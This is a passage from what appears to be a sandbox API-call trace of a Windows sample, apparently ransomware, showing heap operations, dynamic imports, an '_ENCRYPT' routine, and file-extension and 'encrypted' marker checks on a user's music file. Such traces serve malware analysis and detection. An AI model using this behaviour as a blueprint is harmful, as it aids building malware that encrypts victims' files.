hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0038.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0038.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.494] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 1 [0038.494] TranslateMessage (lpMsg=0x6aedfc) returned 0 [0038.494] DispatchMessageW (lpMsg=0x6aedfc) returned 0x0 [0038.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0038.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.494] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6ae498) returned 1 [0038.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.496] KillTimer (hWnd=0x50134, uIDEvent=0x1) returned 1 [0038.496] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0038.496] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0038.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0038.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0038.496] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0038.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0038.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0038.497] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0038.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0038.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0038.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0038.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.498] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0038.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889688 [0038.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889688, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0038.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.498] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0038.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0038.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0038.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0038.499] CloseHandle (hObject=0x140) returned 1 [0038.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0038.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.499] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0038.499] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0038.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0038.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0038.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0038.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0038.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0038.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0038.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.499] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0038.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.500] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.500] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0038.500] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.500] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0038.500] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0038.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.500] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.500] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.500] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.500] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x861d3e90, ftCreationTime.dwHighDateTime=0x1d5c122, ftLastAccessTime.dwLowDateTime=0xdfd494b0, ftLastAccessTime.dwHighDateTime=0x1d5c564, ftLastWriteTime.dwLowDateTime=0xdfd494b0, ftLastWriteTime.dwHighDateTime=0x1d5c564, nFileSizeHigh=0x0, nFileSizeLow=0x1719c, dwReserved0=0x0, dwReserved1=0x777648, cFileName="vW-6Csrf0kc.wav", cAlternateFileName="VW-6CS~1.WAV")) returned 0x7c20c0 [0038.500] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.500] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.500] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x861d3e90, ftCreationTime.dwHighDateTime=0x1d5c122, ftLastAccessTime.dwLowDateTime=0xdfd494b0, ftLastAccessTime.dwHighDateTime=0x1d5c564, ftLastWriteTime.dwLowDateTime=0xdfd494b0, ftLastWriteTime.dwHighDateTime=0x1d5c564, nFileSizeHigh=0x0, nFileSizeLow=0x1719c, dwReserved0=0x0, dwReserved1=0x777648, cFileName="vW-6Csrf0kc.wav", cAlternateFileName="VW-6CS~1.WAV")) returned 0x7c20c0 [0038.500] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.501] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vW-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6Csrf0kc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Csrf0kc.wav\"", cchCount1=9, 